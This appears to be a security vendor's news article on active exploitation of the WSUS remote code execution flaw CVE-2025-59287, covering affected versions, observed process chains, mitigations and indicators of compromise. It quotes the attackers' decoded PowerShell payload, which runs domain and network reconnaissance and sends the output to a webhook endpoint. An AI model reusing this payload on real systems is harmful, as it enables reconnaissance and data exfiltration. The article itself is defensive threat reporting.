Urgent: Microsoft WSUS Remote Code Execution Vulnerability Exploited

CVE-2025-59287 WSUS vulnerability Windows Server Update Services remote code execution cybersecurity patch Tuesday CISA UNC6512
Edward Zhou
Edward Zhou

CEO & Co-Founder

 
October 28, 2025 3 min read

TL;DR

This article details the critical WSUS vulnerability, CVE-2025-59287, which allows remote code execution. It covers active exploitation by threat actors, the technical details of the flaw affecting various Windows Server versions, and specific attack methodologies observed by security researchers. Essential remediation steps, including immediate patching and temporary workarounds like disabling the WSUS role or blocking ports, are provided to help organizations secure their systems.

WSUS Attacks Exploiting CVE-2025-59287

Multiple organizations are affected by attacks exploiting a critical Windows Server Update Services (WSUS) remote code execution vulnerability identified as CVE-2025-59287. Security researchers and threat intelligence teams are actively monitoring the exploitation of this flaw. Microsoft released an emergency patch and CISA added the bug to its Known Exploited Vulnerabilities catalog.

Microsoft has not yet updated its advisory to acknowledge the active exploitation. Google Threat Intelligence Group (GTIG) stated they are actively investigating exploitation of CVE-2025-59287 by a newly identified threat actor, UNC6512, across multiple victim organizations. GTIG observed the actor conducting reconnaissance and data exfiltration from compromised hosts.

Technical Details of CVE-2025-59287

CVE-2025-59287 affects Windows Server versions 2012 through 2025. It stems from insecure deserialization of untrusted data, allowing unauthenticated attackers to execute arbitrary code on vulnerable systems. Servers without the WSUS role enabled are not affected. Initial fixes for CVE-2025-59287 were issued on October's Patch Tuesday, but these did not fully address the vulnerability, necessitating an emergency update.

Trend Micro's Zero Day Initiative reported approximately 100,000 hits exploiting this bug within seven days. They estimate nearly 500,000 internet-facing servers have the WSUS service enabled. Palo Alto Networks' Unit 42 team observed limited impacted customers. Unit 42's analysis indicates attackers are focused on gaining initial access and performing internal network reconnaissance.

Attack Methodology and Observations

Unit 42 observed the following methodology in attacks exploiting CVE-2025-59287:

  • Initial Access: Attackers target publicly exposed WSUS instances on default TCP ports, 8530 (HTTP) and 8531 (HTTPS).
  • Execution: Malicious PowerShell commands are executed via specific parent processes like wsusservice.exe and w3wp.exe. Huntress observed similar process chains:
    • wsusservice.exe → cmd.exe → cmd.exe → powershell.exe
    • w3wp.exe → cmd.exe → cmd.exe → powershell.exe
  • Reconnaissance: Initial payloads gather intelligence on the internal network environment, including commands like whoami, net user /domain, and ipconfig /all.
  • Data Exfiltration: Collected information is exfiltrated to a remote, attacker-controlled Webhook.site endpoint using a PowerShell payload or curl.exe.

Cortex Xpanse identified approximately 5,500 WSUS instances exposed to the internet. Huntress Labs observed threat actors exploiting the WSUS vulnerability across multiple customers, starting around 2025-10-23 23:34 UTC.

Remediation and Mitigation

Microsoft has recommended temporary workarounds for organizations unable to immediately deploy the emergency patches. As of Oct. 27, the guidance consisted of the following mitigations:

  1. Disable the WSUS Server Role: Disabling the WSUS role removes the attack vector, but prevents the server from distributing updates.
  2. Block High-Risk Ports: Block all inbound traffic to TCP ports 8530 and 8531 on the host-level firewall.

CISA urges organizations to implement Microsoft's updated guidance for the WSUS Remote Code Execution Vulnerability.

Huntress Labs Observations

Figure 1: wsusservice.exe → cmd.exe → cmd.exe → powershell.exe
Image courtesy of Huntress Labs

Huntress Labs observed attackers leveraging exposed WSUS endpoints to send specially crafted requests that triggered a deserialization RCE against the update service. Exploitation activity included spawning Command Prompt and PowerShell via the HTTP worker process and WSUS service binary. Proxy networks were used by the attackers to conduct and obfuscate exploitation.

The PowerShell payload (base64 decoded) used by attackers is:

powershell -ec
try{$r= (&{echo https://[REDACTED]:8531; net user /domain; ipconfig /all} |out-string)+ $Error }catch{$_.ToString()} ;$w="http://webhook.site/[REDACTED]";try{iwr -UseBasicParsing -Uri $w -Body $r -Method Put}catch{curl.exe -k $w --data-binary $r}

This payload enumerates servers for sensitive network and user information and extracts results to a remote webhook.

Indicators of Compromise (IOCs)

Huntress Labs identified the following IOCs:

  • C:\Program Files\Update Services\Logfiles\SoftwareDistribution.log: WSUS log file to review indicators of compromise.
  • C:\inetpub\logs\LogFiles\W3SVC*\u_ex*.log: HTTP service log files to review indicators of compromise.
  • w3wp.exe: HTTP worker process binary.
  • wsusservice.exe: WSUS service process binary.
  • whoami;net user /domain: Observed enumeration command.
  • net user /domain; ipconfig /all: Observed enumeration command.
  • CVE-2025-59287
  • Microsoft
Edward Zhou
Edward Zhou

CEO & Co-Founder

 

CEO & Co-Founder of Gopher Security, leading the development of Post-Quantum cybersecurity technologies and solutions.

Related News

China Espionage Threat: BRICKSTORM Malware Targets Tech and Legal Sectors
BRICKSTORM malware

China Espionage Threat: BRICKSTORM Malware Targets Tech and Legal Sectors

Uncover the sophisticated BRICKSTORM malware campaign linked to China. Learn about its tactics, targets, and how to defend your organization. Read more!

By Jim Gagnard December 5, 2025 4 min read
Read full article
Critical RCE Vulnerabilities in React and Next.js Expose Millions
React security

Critical RCE Vulnerabilities in React and Next.js Expose Millions

React & Next.js hit by critical RCE flaws! Learn about CVE-2025-55182, CVE-2025-66478, and CVE-2025-11953. Patch immediately to protect your applications. Read more!

By Divyansh Ingle December 4, 2025 3 min read
Read full article
Combating Cyber Threats: Harnessing AI for Effective Defense
AI cybersecurity

Combating Cyber Threats: Harnessing AI for Effective Defense

Cyberattackers are leveraging AI for sophisticated threats. Discover how to defend your organization with AI-driven strategies and tools. Learn more at Gopher Security.

By Alan V Gutnov December 3, 2025 7 min read
Read full article
Google Patches 120 Android Vulnerabilities, 2 Zero-Days Fixed
Android security updates

Google Patches 120 Android Vulnerabilities, 2 Zero-Days Fixed

Google's latest Android security updates tackle critical vulnerabilities and actively exploited zero-days. Ensure your device is protected! Learn more.

By Alan V Gutnov December 2, 2025 2 min read
Read full article